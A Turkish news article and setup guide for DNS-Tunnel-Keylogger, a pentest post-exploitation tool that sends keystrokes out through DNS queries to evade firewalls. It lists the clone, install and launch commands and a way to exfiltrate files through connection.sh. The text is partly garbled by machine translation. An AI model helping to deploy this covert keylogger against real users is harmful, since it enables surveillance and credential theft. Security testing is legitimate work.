DNS Tüneli Keylogger – Sömürü Sonrası Sızma Testi Aracı


DNS Tüneli Keylogger – Pentester'lar İçin Saldırgan Bir Sömürü Sonrası Araç

Pentester'lar için GitHub'da yeni bir keylogging sunucusu ve istemci aracı yayınlandı. Araç, tuş vuruşlarını güvenlik duvarları üzerinden iletmek için DNS tünellemeyi kullanıyor ve potansiyel olarak tespit edilmekten gizlice kaçıyor.

DNS-Tunnel-Keylogger aracı, sızma testçileri için istismar sonrası faaliyetler için tasarlanmıştır ve güvenlik sistemleri tarafından keşfedilme şansını en aza indirmek için hafif sızma ve kalıcılığı vurgular.

Aracın sunucu bileşeni Python 3'te yazılmıştır ve bağımlılıkların pip aracılığıyla kurulmasını gerektirir.

Varsayılan olarak UDP bağlantı noktası 53'te çalışır, ancak kullanıcılar -p bayrağını kullanarak farklı bir bağlantı noktası belirtebilirler. Sunucunun IP adresi, diğer ad sunucularının sunucuyu bulmasını sağlamak için SOA ve NS kayıtlarında kullanılır.

Kullanıcılara, etki alanlarının ad alanını özel DNS'ye ayarlamaları ve bunu sızıntı sunucusunun IP adresine yönlendirmeleri, böylece birleştirme kayıtlarının etkili bir şekilde ayarlanması talimatı verilir.

DNS tünelleme, DNS sorgularında ve yanıtlarında diğer programların veya protokollerin verilerini kodlamaya yönelik bir tekniktir.

Bu, tespit ve güvenlik duvarı kısıtlamalarından kaçınırken, kullanım sonrası veri çıkarma için özellikle yararlı olabilir.

  • DNS ve ağ kavramları bilgisi
  • Python ve Bash komut dosyalarına aşinalık
  • Keylogger istemcisi için bir Linux ortamı
  • Python3 sunucuda yüklü

İstemci tarafında, Linux keylogger iki bash betiğinden oluşur. connection.sh komut dosyası, yakalanan tuş vuruşlarını sunucuya göndermekten sorumludur; logger.sh komut dosyası, keylogging işlemini başlatmak için kullanılır.

Keylogger sessizce başlatılabilir ve keylogger olmayan bir duruma dönmeyi önlemek için çıkışta kabuk kapatılabilir.

Belge

Posta Kutunuzda Ücretsiz ThreatScan'i Çalıştırın

Trustifi'nin Gelişmiş tehdit koruması, en geniş yelpazedeki karmaşık saldırıları, kullanıcının posta kutusuna ulaşmadan önce önler. Gelişmiş Yapay Zeka Destekli E-posta Koruması ile Trustifi Ücretsiz Tehdit Taramasını deneyin.


Geliştiriciler, keylogger'ın etkileşimli olmayan kabuklarda çalışmayacağını ve Windows'un Dns_Query_A Sunucu yinelenen paketleri atarak bunu halledecek şekilde tasarlanmış olmasına rağmen, işlev yinelenen istekler gönderme eğilimindedir[[

DNS Tüneli Keylogger – Sunucu Kurulumu

1. Adım: Depoyu Klonlayın

Öncelikle GitHub'dan DNS-Tunnel-Keylogger deposunu kopyalamanız gerekir:

git clone https://github.com/Geeoon/DNS-Tunnel-Keylogger.git

Adım 2: Bağımlılıkları Kurun

Klonlanan dizine gidin ve gerekli Python bağımlılıklarını yükleyin:

cd DNS-Tunnel-Keylogger
python3 -m pip install -r requirements.txt

3. Adım: Sunucuyu Başlatın

Sunucuyu başlatmak için aşağıdaki komutu kullanın:

python3 main.py  

Yer değiştirmek sunucunun IP adresiyle ve sunucunun yetkili olduğu etki alanıyla.

Sunucu Seçenekleri:

  • -h, --help: Yardım mesajını gösterin ve çıkın.
  • -p PORT, --port PORT: Dinlemek için farklı bir bağlantı noktası belirtin. Varsayılan olarak sunucu UDP bağlantı noktası 53'ü dinler.

İstemci Kurulumu (Linux Keylogger)

Adım 1: Komut Dosyalarını Hazırlayın

Şundan emin olun: logger.sh Ve connection.sh aynı dizindedir. Bu komut dosyaları tuş vuruşlarını yakalayacak ve sunucuya gönderecektir.

Adım 2: Keylogger'ı başlatın

Keylogger'ı başlatmak için aşağıdaki komutu yürütün:

./logger.sh  && exit

Yer değiştirmek Verilerin gönderileceği alan adı ile. && exit Keyloglanmamış bir kabuğa geri dönmeyi önlemek için çıkışta kabuğu kapatacaktır.

Keylogger Seçenekleri:

  • -p path: Dinlenecek günlük dosyasının yolunu belirtin. Varsayılan olarak bu /tmp/.
  • -l: Günlükçüyü, hata ayıklama için yararlı olabilecek uyarılar ve hatalar yazdırılarak çalıştırın.

Ek Bilgiler

Manuel Veri İletimi

Bir dosya gibi verileri manuel olarak göndermek istiyorsanız, verileri connection.sh Bağlantı kuracak ve verileri gönderecek komut dosyası.

Güvenlik Hususları

Uygun yetkilendirme olmadan kullanıldığında, keylogger ve DNS tünelleme birçok yargı bölgesinde kötü amaçlı ve yasa dışı olarak kabul edilebilir. Bu araçları ortamınızda kullanabildiğinizden ve ilgili tüm yasalara ve etik yönergelere uyduğunuzdan emin olun.

Sorun giderme

  • Sorunla karşılaşırsanız kaldırın &> /dev/null hata mesajlarını görüntülemek için keylogger komutundan.
  • DNS bağlantı noktasının (varsayılan 53) gelen ve giden bağlantılara açık olduğundan emin olmak için sunucunun güvenlik duvarı ayarlarını kontrol edin.
  • Lütfen kullanılan etki alanının doğru şekilde yapılandırıldığını ve sunucunun bunun için yetkili olarak ayarlandığını doğrulayın.

Bu kılavuz, gizli tuş vuruşu sızıntısı için DNS tünelleme keylogger'ı kurma adımlarını sağlar. Bu aracı sorumlu bir şekilde ve yasalara uygun olarak kullanmayı unutmayın.

Siber Güvenlik haberleri, Teknik İncelemeler ve İnfografiklerden haberdar olun. Bizi LinkedIn'de takip edin & heyecan.





Source link